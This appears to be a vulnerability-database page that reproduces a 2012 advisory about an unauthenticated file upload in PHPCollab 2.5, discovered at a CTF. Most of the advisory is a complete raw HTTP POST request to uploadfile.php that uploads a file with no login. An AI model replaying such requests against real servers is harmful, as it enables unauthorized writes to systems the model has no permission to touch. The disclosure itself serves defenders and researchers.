Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PHPCollab 2.5 Unauthenticated File Upload

🗓️ 23 May 2012 00:00:00Reported by team ' and 1=1--Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Unauthenticated File Upload in PHPCollab 2.

Code
`# Exploit Title: phpcollab upload files without any authentication  
# Date: 3/5/2012  
# Author: team ' and 1=1--  
# Software Link: http://www.phpcollab.com/  
# Version: 2.5  
# Vulnerability was found during the AthCon IT Security Conference CTF  
# CTF Organizer: echothrust  
  
During AthCon CTF the team ' and 1=1-- discovered that phpcollab  
allows malicious users to upload files without any authentication on  
the system by conducting the  
following POST request:  
POST  
/phpcollab/projects_site/uploadfile.php?PHPSESSID=f2bb0a2008d0791d1ac45a8a3  
8e51ed2&action=add&project=&task= HTTP/1.1  
Host: 192.0.0.2  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:9.0.1)  
Gecko/20100101 Firefox/9.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
DNT: 1  
Proxy-Connection: keep-alive  
Cookie: PHPSESSID=6cvltmkam146ncp3hfbucumfk6  
Referer: http://192.0.0.2/  
Content-Type: multipart/form-data;  
boundary=---------------------------19548990971636807826563613512  
Content-Length: 29914  
  
-----------------------------19548990971636807826563613512  
Content-Disposition: form-data; name="MAX_FILE_SIZE"  
  
100000000  
-----------------------------19548990971636807826563613512  
Content-Disposition: form-data; name="maxCustom"  
  
  
-----------------------------19548990971636807826563613512  
Content-Disposition: form-data; name="commentsField"  
  
Hello there  
-----------------------------19548990971636807826563613512  
Content-Disposition: form-data; name="upload"; filename="filename.jpg"  
Content-Type: image/jpeg  
file data stripped  
-----------------------------19548990971636807826563613512  
Content-Disposition: form-data; name="submit"  
  
Save  
-----------------------------19548990971636807826563613512--  
  
As an example we uploaded the following image on the web server:  
http://192.0.0.2/phpcollab/files/1--stallowned.jpg  
It must be noted that the application does not allow the uploading of php  
files by checking the filename extension.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 May 2012 00:00Current
phpcollabunauthenticatedfile uploadauthentication bypassvulnerabilityathcon ctfsecurity conference
19